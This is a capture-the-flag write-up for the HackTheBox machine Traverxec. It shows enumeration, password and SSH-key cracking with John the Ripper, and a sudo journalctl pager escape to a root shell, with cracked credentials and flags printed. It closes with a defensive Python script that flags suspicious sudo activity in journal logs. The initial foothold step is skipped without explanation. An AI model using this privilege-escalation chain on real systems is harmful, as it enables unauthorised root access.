HackTheBox Traverxec

Traverxec is a box labeled Easy. The initial foothold comes from exploiting improper security settings, followed by abusing a UNIX binary to bypass local security restrictions.

Enumeration reveals two open ports: SSH and HTTP.

root@kali:~/projects/Traverxec# nmap -sS -Pn -A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-23 05:25 EST
Nmap scan report for 10.10.10.165
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Browsing to http://10.10.10.165/img/portfolio/ we notice the web page is served by nostromo 1.9.6, matching the nmap service banner.

Run LinEnum and notice an htpasswd file containing a password hash:

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Break it with john. Password is Nowonly4me

root@kali:~/projects/Traverxec# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (david)

Found a backup of the SSH public and private keys in tmp/.fuckoff

Convert the RSA key to a format that’s recognizable by John

root@kali:~/projects/Traverxec/keys# /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

Break the password using John. Password is hunter

root@kali:~/projects/Traverxec/keys# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2019-11-24 12:10) 0.1949g/s 2795Kp/s 2795Kc/s 2795KC/sa6_123..*7¡Vamos!
Session completed

Log in using the key and its passphrase. Collect the user flag:

# ssh -i id_rsa david@10.10.10.165
david@traverxec:~$ cat ~/user.txt 
7db0b48469606a42cec20750d9782f3d

Visit https://gtfobins.github.io/ - this is a curated list of UNIX binaries that can be exploited by an attacker to bypass local security restrictions. It's a resource that I've used countless times and I recommend it to anyone preparing for certification exams.

The script server-stats.sh in /home/david/bin/ contains a command executed with sudo. It is vulnerable to breaking out of the restricted environment: journalctl hands its output to a pager when run interactively, and the pager can spawn a shell. The script pipes the output through cat, which avoids the pager, but sudo permits the journalctl command itself, so it can be run as root without the pipe.

https://gtfobins.github.io/gtfobins/journalctl/

david@traverxec:~/bin$ ls ~/bin/server-stats.sh 
/home/david/bin/server-stats.sh
david@traverxec:~/bin$ tail 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Invoke the command directly under sudo and break out of the restricted environment from the pager:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 
-- Logs begin at Sun 2019-11-24 13:32:42 EST, end at Sun 2019-11-24 13:40:20 EST. --
Nov 24 13:39:48 traverxec sudo[24788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/11 ruser=www-data r
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): conversation failed
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Nov 24 13:39:50 traverxec sudo[24788]: www-data : command not allowed ; TTY=pts/11 ; PWD=/tmp ; USER=root ; COMMAND=list
Nov 24 13:40:08 traverxec crontab[25707]: (www-data) LIST (www-data)
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
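From the defender's side, the journal excerpt above already records the whole chain: www-data (the web server account) failing sudo authentication and being denied a `sudo -l` (logged as COMMAND=list, the check LinEnum runs), followed by david running a pager-capable binary as root. As an added example that is not part of the original writeup, the following script runs simple detection rules over those lines; the last sample line is a constructed success record in sudo's standard log format, and the account and binary watchlists are assumptions.

```python
import re

# Sample journal excerpt, constructed for this example: the first five lines are the
# ones quoted in the writeup (the first one truncated as shown there); the last line is
# a made-up success record in sudo's standard log format for david's journalctl run.
SAMPLE_JOURNAL = """\
Nov 24 13:39:48 traverxec sudo[24788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/11 ruser=www-data r
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): conversation failed
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Nov 24 13:39:50 traverxec sudo[24788]: www-data : command not allowed ; TTY=pts/11 ; PWD=/tmp ; USER=root ; COMMAND=list
Nov 24 13:40:08 traverxec crontab[25707]: (www-data) LIST (www-data)
Nov 24 13:41:02 traverxec sudo[25901]:    david : TTY=pts/12 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service
"""

# Daemon accounts that have no business calling sudo; a hit means the service is compromised (assumed list).
SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon", "nostromo"}
# Binaries that hand an interactive pager/editor to the caller when run as root (assumed list, see GTFOBins).
PAGER_CAPABLE = {"/usr/bin/journalctl", "/usr/bin/less", "/usr/bin/more", "/usr/bin/man"}

PAM_FAIL = re.compile(r"sudo\[(\d+)\]: pam_unix\(sudo:auth\): authentication failure;.*?\bruser=(\S+)")
SUDO_DENY = re.compile(r"sudo\[(\d+)\]:\s*(\S+) : command not allowed ;.*?COMMAND=(\S+)")
SUDO_RUN = re.compile(r"sudo\[(\d+)\]:\s*(\S+) : TTY=\S+ ; PWD=\S+ ; USER=(\S+) ; COMMAND=(\S+)")


def analyse(journal_text):
    """Return (severity, pid, user, reason) tuples for suspicious sudo activity."""
    findings = []
    for line in journal_text.splitlines():
        m = PAM_FAIL.search(line)
        if m and m.group(2) in SERVICE_ACCOUNTS:
            findings.append(("high", m.group(1), m.group(2), "service account tried to authenticate to sudo"))
            continue
        m = SUDO_DENY.search(line)
        if m:
            # COMMAND=list is 'sudo -l', the privilege check that enumeration scripts such as LinEnum run.
            sev = "high" if m.group(2) in SERVICE_ACCOUNTS else "medium"
            findings.append((sev, m.group(1), m.group(2), "sudo denied, COMMAND=" + m.group(3)))
            continue
        m = SUDO_RUN.search(line)
        if m and m.group(3) == "root" and m.group(4) in PAGER_CAPABLE:
            findings.append(("medium", m.group(1), m.group(2), "pager-capable binary run as root: " + m.group(4)))
    return findings


if __name__ == "__main__":
    for sev, pid, user, reason in analyse(SAMPLE_JOURNAL):
        print(f"[{sev}] sudo pid {pid} user {user}: {reason}")
```

The first two findings alone are enough to trigger an investigation of the web server: a daemon account should never reach sudo at all.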

Get the root flag, located in /root:

# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906